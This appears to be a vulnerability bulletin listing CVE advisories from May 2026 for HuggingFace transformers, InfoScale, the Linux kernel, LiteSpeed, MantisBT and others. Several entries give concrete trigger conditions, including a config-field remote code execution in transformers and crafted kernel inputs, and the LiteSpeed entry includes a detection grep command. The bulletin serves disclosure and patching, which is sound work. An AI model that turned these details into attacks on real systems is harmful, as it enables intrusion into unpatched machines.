huggingface–huggingface/transformers A critical remote code execution vulnerability exists in all versions of the HuggingFace transformers library prior to version 5.3.0. The vulnerability allows an attacker to craft a malicious `config.json` file containing the `_attn_implementation_internal` field set to an attacker-controlled HuggingFace Hub repository ID. When a victim loads this model using the standard `AutoModelForCausalLM.from_pretrained()` API, the library downloads and executes arbitrary Python code from the attacker’s repository with the victim’s full OS privileges. This issue arises due to unfiltered deserialization of configuration attributes, insufficient sanitization of internal fields, and unsandboxed execution of downloaded kernels. The vulnerability bypasses the `trust_remote_code` security mechanism, is invisible to the victim, and exploits the standard documented usage pattern, making it particularly severe. Users are advised to upgrade to version 5.3.0 or later to mitigate this issue. 2026-05-24 not yet calculated CVE-2026-4372 https://huntr.com/bounties/1f693a6e-6836-4b8b-a0bd-ca036fba8884
https://github.com/huggingface/transformers/commit/a7f8e7ff37d87d1a1a0c8cf607971c607741452f
 
InfoScale–CmdServer InfoScale CmdServer before 7.4.2 mishandles access control. 2026-05-20 not yet calculated CVE-2026-44926 https://www.veritas.com/support/en_US/doc/109864724-141543588-0/v141217547-141543588
https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766081&articleTitle=InfoScale_Command_Server_Security_Bulletin_for_CVE_2026_44926
 
InfoScale–VIOM SQL injection in InfoScale VIOM before v9.1.3 allows remote attackers to escalate privileges. 2026-05-20 not yet calculated CVE-2026-44923 https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640
https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925
 
InfoScale–VIOM InfoScale VIOM 9.1.3 allows XSS. 2026-05-20 not yet calculated CVE-2026-44924 https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640
https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925
 
InfoScale–VIOM Cross-Site Request Forgery (CSRF) vulnerability in InfoScale v.9.1.3 Operations Manager (VIOM) allows an attacker to force a user with an active session into clicking a malicious HTML link, which triggers unintended modifications on the VIOM web application without the user’s knowledge. 2026-05-20 not yet calculated CVE-2026-44925 https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640
https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925
 
Innoshop–Innoshop 0.6.0 An authorization vulnerability exists in Innoshop 0.6.0. After logging into the frontend, an attacker can directly access backend application interfaces, leading to further dangerous operations. 2026-05-19 not yet calculated CVE-2026-39250 https://www.innoshop.com/
https://gist.github.com/hkdmh/4af513ea7589212cb1d49bc5d972972e
 
Jaspersoft–JasperReports Library Community Edition Java Deserialisation Vulnerability in Jaspersoft Reports Library leads to Remote Code Execution (RCE), potentially allowing code execution on the affected system. 2026-05-19 not yet calculated CVE-2026-6009 https://community.jaspersoft.com/advisories/jaspersoft-security-advisory-may-19-2026-jaspersoft-library-cve-2026-6009-r11/
 
JJNAPIORK–Catalyst::Plugin::Authentication Catalyst::Plugin::Authentication versions through 0.10024 for Perl are susceptible to timing attacks. These versions use Perl’s built-in eq comparison. Discrepancies in timing could be used to guess the underlying hash or password. 2026-05-21 not yet calculated CVE-2026-5091 https://metacpan.org/release/ETHER/Catalyst-Plugin-Authentication-0.10_025/changes
https://github.com/perl-catalyst/Catalyst-Plugin-Authentication/commit/b0515f492257438cf07082acf1e10d06e8088a5e.patch
 
LalanaChami–Pharmacy Management System The LalanaChami Pharmacy Management System (commit 5c3d028) allows unauthenticated remote attackers to escalate privileges by self-assigning an administrative role during registration. The /api/user/signup endpoint fails to validate the role parameter in the request body. 2026-05-19 not yet calculated CVE-2026-31070 https://github.com/LalanaChami/Pharmacy-Mangment-System/blob/5c3d02888631166649856f71d542387114b3010b/backend/routes/user.js#L16
https://gist.github.com/nedlir/22bf6d1a3a07209be3e343744bc81d51
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the maximum server registration per node Current code does no bound checking on the number of servers added per node. A malicious client can flood NEW_SERVER messages and exhaust memory. Fix this issue by limiting the maximum number of server registrations to 256 per node. If the NEW_SERVER message is received for an old port, then don’t restrict it as it will get replaced. While at it, also rate limit the error messages in the failure path of qrtr_ns_worker(). Note that the limit of 256 is chosen based on the current platform requirements. If requirement changes in the future, this limit can be increased. 2026-05-19 not yet calculated CVE-2026-43491 https://git.kernel.org/stable/c/e6f6cd501fb54060940a6eb3f4103eeb5e426ae7
https://git.kernel.org/stable/c/3efaad55cad1ded429e3a873bfece389058a526b
https://git.kernel.org/stable/c/35fb4a0c077c5d1049c2628b769e0a1b1e65df0d
https://git.kernel.org/stable/c/868202aa2adae427060a42d5bd663b4d782ec02c
https://git.kernel.org/stable/c/d5ee2ff98322337951c56398e79d51815acbf955
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: lib/crypto: mpi: Fix integer underflow in mpi_read_raw_from_sgl() Yiming reports an integer underflow in mpi_read_raw_from_sgl() when subtracting “lzeros” from the unsigned “nbytes”. For this to happen, the scatterlist “sgl” needs to occupy more bytes than the “nbytes” parameter and the first “nbytes + 1” bytes of the scatterlist must be zero. Under these conditions, the while loop iterating over the scatterlist will count more zeroes than “nbytes”, subtract the number of zeroes from “nbytes” and cause the underflow. When commit 2d4d1eea540b (“lib/mpi: Add mpi sgl helpers”) originally introduced the bug, it couldn’t be triggered because all callers of mpi_read_raw_from_sgl() passed a scatterlist whose length was equal to “nbytes”. However since commit 63ba4d67594a (“KEYS: asymmetric: Use new crypto interface without scatterlists”), the underflow can now actually be triggered. When invoking a KEYCTL_PKEY_ENCRYPT system call with a larger “out_len” than “in_len” and filling the “in” buffer with zeroes, crypto_akcipher_sync_prep() will create an all-zero scatterlist used for both the “src” and “dst” member of struct akcipher_request and thereby fulfil the conditions to trigger the bug: sys_keyctl() keyctl_pkey_e_d_s() asymmetric_key_eds_op() software_key_eds_op() crypto_akcipher_sync_encrypt() crypto_akcipher_sync_prep() crypto_akcipher_encrypt() rsa_enc() mpi_read_raw_from_sgl() To the user this will be visible as a DoS as the kernel spins forever, causing soft lockup splats as a side effect. Fix it. 2026-05-19 not yet calculated CVE-2026-43492 https://git.kernel.org/stable/c/2aa77a18dc7f2670497fe3ee5acbeda0b57659e5
https://git.kernel.org/stable/c/26d3a97ad46c7a9226ec04d4bf35bd4998a97d16
https://git.kernel.org/stable/c/8637dfb4c1d8a7026ef681f2477c6de8b71c4003
https://git.kernel.org/stable/c/30e513e755bb381afce6fb57cdc8694136193f22
https://git.kernel.org/stable/c/8c2f1288250a90a4b5cabed5d888d7e3aeed4035
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: net/rds: reset op_nents when zerocopy page pin fails When iov_iter_get_pages2() fails in rds_message_zcopy_from_user(), the pinned pages are released with put_page(), and rm->data.op_mmp_znotifier is cleared. But we fail to properly clear rm->data.op_nents. Later when rds_message_purge() is called from rds_sendmsg() the cleanup loop iterates over the incorrectly non zero number of op_nents and frees them again. Fix this by properly resetting op_nents when it should be in rds_message_zcopy_from_user(). 2026-05-21 not yet calculated CVE-2026-43494 https://git.kernel.org/stable/c/9115669faedccdda100428e2d26fd0aac8c50799
https://git.kernel.org/stable/c/0bbbff00a15b1df2cac9014d6cf4b6890f473353
https://git.kernel.org/stable/c/640e37f58f991546a87540d067279c2c1fa9fe51
https://git.kernel.org/stable/c/290e833d1acb1093bc121fcdc97f5e6161157479
https://git.kernel.org/stable/c/e174929793195e0cd6a4adb0cad731b39f9019b4
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: net: wwan: t7xx: validate port_count against message length in t7xx_port_enum_msg_handler t7xx_port_enum_msg_handler() uses the modem-supplied port_count field as a loop bound over port_msg->data[] without checking that the message buffer contains sufficient data. A modem sending port_count=65535 in a 12-byte buffer triggers a slab-out-of-bounds read of up to 262140 bytes. Add a sizeof(*port_msg) check before accessing the port message header fields to guard against undersized messages. Add a struct_size() check after extracting port_count and before the loop. In t7xx_parse_host_rt_data(), guard the rt_feature header read with a remaining-buffer check before accessing data_len, validate feat_data_len against the actual remaining buffer to prevent OOB reads and signed integer overflow on offset. Pass msg_len from both call sites: skb->len at the DPMAIF path after skb_pull(), and the validated feat_data_len at the handshake path. 2026-05-21 not yet calculated CVE-2026-43495 https://git.kernel.org/stable/c/f94450ce5053b36002995b72d1fa1db3bb08c5bf
https://git.kernel.org/stable/c/9855e063e063158cc5bded576382599dc3133202
https://git.kernel.org/stable/c/2b56d7903ab804481f5233a259d5f341e9fd513c
https://git.kernel.org/stable/c/dd4f4c93c1488d7100b9964f2da4c8b3c29652f1
https://git.kernel.org/stable/c/0e7c074cfcd9bd93765505f9eb8b42f03ed2a744
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_red: Replace direct dequeue call with peek and qdisc_dequeue_peeked When red qdisc has children (eg qfq qdisc) whose peek() callback is qdisc_peek_dequeued(), we could get a kernel panic. When the parent of such qdiscs (eg illustrated in patch #3 as tbf) wants to retrieve an skb from its child (red in this case), it will do the following: 1a. do a peek() – and when sensing there’s an skb the child can offer, then – the child in this case(red) calls its child’s (qfq) peek. qfq does the right thing and will return the gso_skb queue packet. Note: if there wasn't a gso_skb entry then qfq will store it there. 1b. invoke a dequeue() on the child (red). And herein lies the problem. – red will call the child’s dequeue() which will essentially just try to grab something of qfq’s queue. [ 78.667668][ T363] KASAN: null-ptr-deref in range [0x0000000000000048-0x000000000000004f] [ 78.667927][ T363] CPU: 1 UID: 0 PID: 363 Comm: ping Not tainted 7.1.0-rc1-00033-g46f74a3f7d57-dirty #790 PREEMPT(full) [ 78.668263][ T363] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 78.668486][ T363] RIP: 0010:qfq_dequeue+0x446/0xc90 [sch_qfq] [ 78.668718][ T363] Code: 54 c0 e8 dd 90 00 f1 48 c7 c7 e0 03 54 c0 48 89 de e8 ce 90 00 f1 48 8d 7b 48 b8 ff ff 37 00 48 89 fa 48 c1 e0 2a 48 c1 ea 03 <80> 3c 02 00 74 05 e8 ef a1 e1 f1 48 8b 7b 48 48 8d 54 24 58 48 8d [ 78.669312][ T363] RSP: 0018:ffff88810de573e0 EFLAGS: 00010216 [ 78.669533][ T363] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 78.669790][ T363] RDX: 0000000000000009 RSI: 0000000000000004 RDI: 0000000000000048 [ 78.670044][ T363] RBP: ffff888110dc4000 R08: ffffffffb1b0885a R09: fffffbfff6ba9078 [ 78.670297][ T363] R10: 0000000000000003 R11: ffff888110e31c80 R12: 0000001880000000 [ 78.670560][ T363] R13: ffff888110dc4150 R14: ffff888110dc42b8 R15: 0000000000000200 [ 78.670814][ T363] FS: 00007f66a8f09c40(0000) GS:ffff888163428000(0000) knlGS:0000000000000000 [ 78.671110][ T363] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 78.671324][ T363] CR2: 000055db4c6a30a8 CR3: 000000010da67000 CR4: 0000000000750ef0 [ 78.671585][ T363] PKRU: 55555554 [ 78.671713][ T363] Call Trace: [ 78.671843][ T363] <TASK> [ 78.671936][ T363] ? __pfx_qfq_dequeue+0x10/0x10 [sch_qfq] [ 78.672148][ T363] ? __pfx__printk+0x10/0x10 [ 78.672322][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672496][ T363] ? lockdep_hardirqs_on_prepare+0xa8/0x1a0 [ 78.672706][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672875][ T363] ? trace_hardirqs_on+0x19/0x1a0 [ 78.673047][ T363] red_dequeue+0x65/0x270 [sch_red] [ 78.673217][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.673385][ T363] tbf_dequeue.cold+0xb0/0x70c [sch_tbf] [ 78.673566][ T363] __qdisc_run+0x169/0x1900 The right thing to do in #1b is to grab the skb off gso_skb queue. This patchset fixes that issue by changing #1b to use qdisc_dequeue_peeked() method instead. 2026-05-21 not yet calculated CVE-2026-43496 https://git.kernel.org/stable/c/36aa34f42cb6842cf371f3a2d3e855d24fd57a50
https://git.kernel.org/stable/c/ce051eede433f876d322ac3550a36a3c6fc4c231
https://git.kernel.org/stable/c/8d09618840b99ef00154d3e731ce9b11e096196d
https://git.kernel.org/stable/c/587dcf970a525f543d8b5855d9f37a4ca97b76ef
https://git.kernel.org/stable/c/458d5615272d3de535748342eb68ca492343048c
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: fbdev: udlfb: add vm_ops to dlfb_ops_mmap to prevent use-after-free dlfb_ops_mmap() uses remap_pfn_range() to map vmalloc framebuffer pages to userspace but sets no vm_ops on the VMA. This means the kernel cannot track active mmaps. When dlfb_realloc_framebuffer() replaces the backing buffer via FBIOPUT_VSCREENINFO, existing mmap PTEs are not invalidated. On USB disconnect, dlfb_ops_destroy() calls vfree() on the old pages while userspace PTEs still reference them, resulting in a use-after-free: the process retains read/write access to freed kernel pages. Add vm_operations_struct with open/close callbacks that maintain an atomic mmap_count on struct dlfb_data. In dlfb_realloc_framebuffer(), check mmap_count and return -EBUSY if the buffer is currently mapped, preventing buffer replacement while userspace holds stale PTEs. Tested with PoC using dummy_hcd + raw_gadget USB device emulation. 2026-05-21 not yet calculated CVE-2026-43497 https://git.kernel.org/stable/c/4f312c30f0368e8d2a76aa650dff73f23490b5e7
https://git.kernel.org/stable/c/18dd358de72d57993422cbb5dfb29ccd74efe192
https://git.kernel.org/stable/c/da9b065cedfd3b574f229d5be594e6aa47a27ae6
https://git.kernel.org/stable/c/a2c53a3822ee26e8d758071815b9ed3bf6669fc1
https://git.kernel.org/stable/c/8de779dc40d35d39fa07387b6f921eb11df0f511
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Disallow re-exporting imported GEM objects Prevent re-exporting of imported GEM buffers by adding a custom prime_handle_to_fd callback that checks if the object is imported and returns -EOPNOTSUPP if so. Re-exporting imported GEM buffers causes loss of buffer flags settings, leading to incorrect device access and data corruption. 2026-05-21 not yet calculated CVE-2026-43498 https://git.kernel.org/stable/c/3756043dd695bba34cc728cdc5688dcb49ac8043
https://git.kernel.org/stable/c/7dd57d7a6350770dfc283287125c409e995200e0
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: rtmutex: Use waiter::task instead of current in remove_waiter() remove_waiter() is used by the slowlock paths, but it is also used for proxy-lock rollback in rt_mutex_start_proxy_lock() when invoked from futex_requeue(). In the latter case waiter::task is not current, but remove_waiter() operates on current for the dequeue operation. That results in several problems: 1) the rbtree dequeue happens without waiter::task::pi_lock being held 2) the waiter task’s pi_blocked_on state is not cleared, which leaves a dangling pointer primed for UAF around. 3) rt_mutex_adjust_prio_chain() operates on the wrong top priority waiter task Use waiter::task instead of current in all related operations in remove_waiter() to cure those problems. [ tglx: Fixup rt_mutex_adjust_prio_chain(), add a comment and amend the changelog ] 2026-05-21 not yet calculated CVE-2026-43499 https://git.kernel.org/stable/c/8a1fc8d698ac5e5916e3082a0f74450d71f9611f
https://git.kernel.org/stable/c/6d52dfcb2a5db86e346cf51f8fcf2071b8085166
https://git.kernel.org/stable/c/3fb7394a837740770f0d6b4b30567e60786a63f2
https://git.kernel.org/stable/c/88614876370aac8ad1050ad785a4c095ba17ac11
https://git.kernel.org/stable/c/3bfdc63936dd4773109b7b8c280c0f3b5ae7d349
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: ipv6: rpl: reserve mac_len headroom when recompressed SRH grows ipv6_rpl_srh_rcv() decompresses an RFC 6554 Source Routing Header, swaps the next segment into ipv6_hdr->daddr, recompresses, then pulls the old header and pushes the new one plus the IPv6 header back. The recompressed header can be larger than the received one when the swap reduces the common-prefix length the segments share with daddr (CmprI=0, CmprE>0, seg[0][0] != daddr[0] gives the maximum +8 bytes). pskb_expand_head() was gated on segments_left == 0, so on earlier segments the push consumed unchecked headroom. Once skb_push() leaves fewer than skb->mac_len bytes in front of data, skb_mac_header_rebuild()’s call to: skb_set_mac_header(skb, -skb->mac_len); will store (data - head) - mac_len into the u16 mac_header field, which wraps to ~65530, and the following memmove() writes mac_len bytes ~64KiB past skb->head. A single AF_INET6/SOCK_RAW/IPV6_HDRINCL packet over lo with a two segment type-3 SRH (CmprI=0, CmprE=15) reaches headroom 8 after one pass; KASAN reports a 14-byte OOB write in ipv6_rthdr_rcv. Fix this by expanding the head whenever the remaining room is less than the push size plus mac_len, and request that much extra so the rebuilt MAC header fits afterwards. 2026-05-21 not yet calculated CVE-2026-43501 https://git.kernel.org/stable/c/8e8be63465a5e80394c70324603dfea1bfdad48f
https://git.kernel.org/stable/c/4babc2d9fda2df43823b85d08a0180b68f1b0854
https://git.kernel.org/stable/c/c261d07a80576dc8ccf394ef8f074f8c67a06b37
https://git.kernel.org/stable/c/7398ebefbfd4f8a31d4f665a4213302fa995494b
https://git.kernel.org/stable/c/9e6bf146b55999a095bb14f73a843942456d1adc
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: net/rds: handle zerocopy send cleanup before the message is queued A zerocopy send can fail after user pages have been pinned but before the message is attached to the sending socket. The purge path currently infers zerocopy state from rm->m_rs, so an unqueued message can be cleaned up as if it owned normal payload pages. However, zerocopy ownership is really determined by the presence of op_mmp_znotifier, regardless of whether the message has reached the socket queue. Capture op_mmp_znotifier up front in rds_message_purge() and use it as the cleanup discriminator. If the message is already associated with a socket, keep the existing completion path. Otherwise, drop the pinned page accounting directly and release the notifier before putting the payload pages. This keeps early send failure cleanup consistent with the zerocopy lifetime rules without changing the normal queued completion path. 2026-05-21 not yet calculated CVE-2026-43502 https://git.kernel.org/stable/c/21d70744e6d3bbf9293aa1ee6fba7c53ad75275e
https://git.kernel.org/stable/c/3abc8983b2bae3f487f77d9da5527d7d6b210d46
https://git.kernel.org/stable/c/14ef6fd18db2494098b21e0471bf27a1d8e9993e
https://git.kernel.org/stable/c/0f5c185fc79a59ee9991234dd6d2a3e5afa6e75b
https://git.kernel.org/stable/c/44b550d88b267320459d518c0743a241ab2108fa
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: net: skbuff: propagate shared-frag marker through frag-transfer helpers Two frag-transfer helpers (__pskb_copy_fclone() and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in skb_shinfo()->flags when moving frags from source to destination. __pskb_copy_fclone() defers the rest of the shinfo metadata to skb_copy_header() after copying frag descriptors, but that helper only carries over gso_{size,segs, type} and never touches skb_shinfo()->flags; skb_shift() moves frag descriptors directly and leaves flags untouched. As a result, the destination skb keeps a reference to the same externally-owned or page-cache-backed pages while reporting skb_has_shared_frag() as false. The mismatch is harmful in any in-place writer that uses skb_has_shared_frag() to decide whether shared pages must be detoured through skb_cow_data(). ESP input is one such writer (esp4.c, esp6.c), and a single nft 'dup to <local>' rule — or any other nf_dup_ipv4() / xt_TEE caller — is enough to land a pskb_copy()’d skb in esp_input() with the marker stripped, letting an unprivileged user write into the page cache of a root-owned read-only file via authencesn-ESN stray writes. Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors were actually moved from the source. skb_copy() and skb_copy_expand() share skb_copy_header() too but linearize all paged data into freshly allocated head storage and emerge with nr_frags == 0, so skb_has_shared_frag() returns false on its own; they need no change. The same omission exists in skb_gro_receive() and skb_gro_receive_list(). The former moves the incoming skb’s frag descriptors into the accumulator’s last sub-skb via two paths (a direct frag-move loop and the head_frag + memcpy path); the latter chains the incoming skb whole onto p’s frag_list. Downstream skb_segment() reads only skb_shinfo(p)->flags, and skb_segment_list() reuses each sub-skb’s shinfo as the nskb — both p and lp must carry the marker. The same omission also exists in tcp_clone_payload(), which builds an MTU probe skb by moving frag descriptors from skbs on sk_write_queue into a freshly allocated nskb. The helper falls into the same family and warrants the same fix for consistency; no TCP TX-side in-place writer is currently known to reach a user page through this gap, but a future consumer depending on the marker would regress silently. The same omission exists in skb_segment(): the per-iteration flag merge takes only head_skb’s flag, and the inner switch that rebinds frag_skb to list_skb on head_skb-frags exhaustion does not fold the new frag_skb’s flag into nskb. Fold frag_skb’s flag at both sites so segments drawing frags from frag_list members carry the marker. 2026-05-23 not yet calculated CVE-2026-43503 https://git.kernel.org/stable/c/fbeab9555564a1b98e8582cd106dfe46c4606991
https://git.kernel.org/stable/c/179f1852bdedc300e373e807cc102cd81feff196
https://git.kernel.org/stable/c/12401fcfb01f53ccc63ab0a3246570fe8f3105ee
https://git.kernel.org/stable/c/989214c66884d70716d83dc1d0bf5e16287bf349
https://git.kernel.org/stable/c/fc6eb39c55e97df2f94ad974b8a5bbcd019da2c8
https://git.kernel.org/stable/c/ff375cc75f9167168db38e0464a482d5fbc8d81d
https://git.kernel.org/stable/c/9bc9d6d6967a2239aa57af2aa53554eddd640d20
https://git.kernel.org/stable/c/48f6a5356a33dd78e7144ae1faef95ffc990aae0
 
Linux–Linux In the Linux kernel, the following vulnerability has been resolved: net: skbuff: preserve shared-frag marker during coalescing skb_try_coalesce() can attach paged frags from @from to @to. If @from has SKBFL_SHARED_FRAG set, the resulting @to skb can contain the same externally-owned or page-cache-backed frags, but the shared-frag marker is currently lost. That breaks the invariant relied on by later in-place writers. In particular, ESP input checks skb_has_shared_frag() before deciding whether an uncloned nonlinear skb can skip skb_cow_data(). If TCP receive coalescing has moved shared frags into an unmarked skb, ESP can see skb_has_shared_frag() as false and decrypt in place over page-cache backed frags. Propagate SKBFL_SHARED_FRAG when skb_try_coalesce() transfers paged frags. The tailroom copy path does not need the marker because it copies bytes into @to’s linear data rather than transferring frag descriptors. 2026-05-23 not yet calculated CVE-2026-46300 https://git.kernel.org/stable/c/3599e6b3cc1ada96883d496a50a210d3afbb6987
https://git.kernel.org/stable/c/2f2b16022a2e10ca7bccfb98db5ed2ec0f72641c
https://git.kernel.org/stable/c/9d3e5fd19fe1063bf607219e8562fbd567b8e8d5
https://git.kernel.org/stable/c/78bf6b6bb19541d19fbda6242e7cfe2c682763c0
https://git.kernel.org/stable/c/760e1addc27ba1a7beb4a0a7e8b3e9ec49e7a34e
https://git.kernel.org/stable/c/3bd9e113d50034db99d7ef69fd8e5242d15e414a
https://git.kernel.org/stable/c/3884358a9286b17f389a72b1426fc4547c23c111
https://git.kernel.org/stable/c/f84eca5817390257cef78013d0112481c503b4a3
 
LiteSpeed Technologies–cPanel Plugin LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild in May 2026. Detection is best done via a command line of grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2>/dev/null in Bash. If you get no output, you have not been hit with exploitation of the vulnerability. If there is output, we recommend you examine the IP addresses in the list, determine if they are valid IP addresses, and if not, block them. To determine damage done, examine the system logs for use by the detected IP addresses. The issue is related to mishandling of Redis enable/disable features. The recommended minimum version is 2.4.7. 2026-05-21 not yet calculated CVE-2026-48172 https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/cpanel
https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log
https://blog.litespeedtech.com/2026/05/21/security-update-for-litespeed-cpanel-plugin/
 
lostisland–faraday Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3. 2026-05-19 not yet calculated CVE-2026-33637 https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484
https://github.com/advisories/GHSA-33mh-2634-fwr2
 
LXQt–PCManFM-Qt An issue was discovered in all versions of PCManFM-Qt starting from 1.1.0. When a regular file’s path is passed as a URI in an org.freedesktop.FileManager1.ShowFolders D-Bus method call, PCManFM-Qt delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution or circumvent network namespace restrictions. NOTE: those outcomes are potentially unwanted by most users; however, the behavior of the product does comply with the applicable specification, and a simplistic solution (ensuring that the URI does not name a regular file) may have adverse consequences for I/O. 2026-05-22 not yet calculated CVE-2026-48700 https://www.openwall.com/lists/oss-security/2026/05/20/2
https://www.openwall.com/lists/oss-security/2026/05/19/1
https://github.com/lxqt/pcmanfm-qt/releases
 
M-Files Corporation–M-Files Server Denial-of-service condition in M-Files Server versions before 26.5.16015.0, before 26.2 LTS, and before 25.8 LTS SR3 allows an authenticated user to cause the MFserver process to crash. 2026-05-18 not yet calculated CVE-2026-0983 https://empower.m-files.com/security-advisories/CVE-2026-0983
 
mailcow–mailcow-dockerized mailcow-dockerized contains a stored cross-site scripting vulnerability in the administrator Queue Manager. The Queue Manager fetches mail queue entries from /api/v1/get/mailq/all, copies server-controlled Postfix queue fields into DataTables rows, and renders several of those fields as HTML without adequate output encoding. This issue affects mailcow-dockerized: 2026-03b. 2026-05-20 not yet calculated CVE-2026-7460 https://fluidattacks.com/advisories/mojabi
https://github.com/mailcow/mailcow-dockerized
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.0 and 2.28.1 allow a low-privileged authenticated user assigned the “add_profile_threshold” permission to create a global profile despite not having manage_global_profile_threshold, by tampering with the user_id parameter in a valid profile creation request. This issue has been fixed in version 2.28.2. 2026-05-19 not yet calculated CVE-2026-33052 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-68w5-w573-q2r8
https://github.com/mantisbt/mantisbt/commit/3f952e68fa864e0e60abc3e84adecf3cfa84c75e
https://mantisbt.org/bugs/view.php?id=36974
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior have a Privilege Escalation vulnerability where insufficient access control checks in ProjectUsersAddCommand (manage_proj_user_add.php) allow users having manage_project_threshold access level (manager by default) to grant project-level administrator access to any user (including themselves) in any Project they have manager rights in. The normal project-user add form restricts the selectable access levels to the actor’s own project role or below. However, the backend handler still accepts a forged higher access_level value and writes it. The consequences of the privilege escalation are slight, as having administrator access at Project level is effectively not very different from being manager, and it does not actually give administrator privileges on the whole MantisBT instance. In particular, it does not let the upgraded user delete the Project or grant them any access to global administrative functions such as managing Users, Projects, Plugins, Custom Fields, etc. This issue has been fixed in version 2.28.2. 2026-05-19 not yet calculated CVE-2026-34390 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-frf7-jhp9-jxm6
https://github.com/mantisbt/mantisbt/commit/69e0180f180ed5acf48a8d281a73683a7bf32461
https://mantisbt.org/bugs/view.php?id=36995
https://mantisbt.org/bugs/view.php?id=37002
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior contain a Stored XSS vulnerability. When cloning an issue originating from a Project other than the current one, the clone form (bug_report_page.php) prepends the source Project name before the category selector without proper escaping, allowing an attacker to inject HTML if they can set the Project’s name (which typically requires manager or administrator access level). This issue has been resolved in version 2.28.2. 2026-05-19 not yet calculated CVE-2026-34463 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-fvjf-68wh-rwp2
https://github.com/mantisbt/mantisbt/commit/df22697ae497ddd93f3d9132fdf4979db8d081cd
https://mantisbt.org/bugs/view.php?id=36986
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior are vulnerable to Authorization Bypass through the private issue monitoring feature. Using a crafted POST request to bug_monitor_add.php, a user with project-level access can add themselves as a monitor for a private issue they do not have access to. Despite displaying an Access Denied error, the application accepts the request and creates a monitor relationship for the private issue. Direct access to the private issue remains blocked, but the user will receive email notifications for updates, leading to disclosure of the private issue’s metadata and content. This issue has been fixed in version 2.28.2. 2026-05-19 not yet calculated CVE-2026-34579 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-ggw7-9675-6v4v
https://github.com/mantisbt/mantisbt/commit/0a93267deba445fb9d15250c16e6fdb1246ffa65
https://mantisbt.org/bugs/view.php?id=36975
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior permit a user to list and download their own attachments from an Issue created by another user even after it becomes private, bypassing read access revocation. The loss of confidentiality caused by this vulnerability is minimal, considering that only attachments previously uploaded by the user themselves remain accessible. This issue has been fixed in version 2.82.2. 2026-05-19 not yet calculated CVE-2026-34744 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-rmp5-5jj7-gmvf
https://github.com/mantisbt/mantisbt/commit/de7bdeec36de066235e38a77bf056917d951c84d
https://mantisbt.org/bugs/view.php?id=36977
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow a bugnote author to access the note’s Revisions page after losing access to the parent private issue. This issue has been fixed in version 2.28.2. 2026-05-19 not yet calculated CVE-2026-34970 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-crmx-4p49-46m2
https://github.com/mantisbt/mantisbt/commit/71df1f67e05b2050cd4bd87839e6cc13747cf03f
https://mantisbt.org/bugs/view.php?id=36978
 
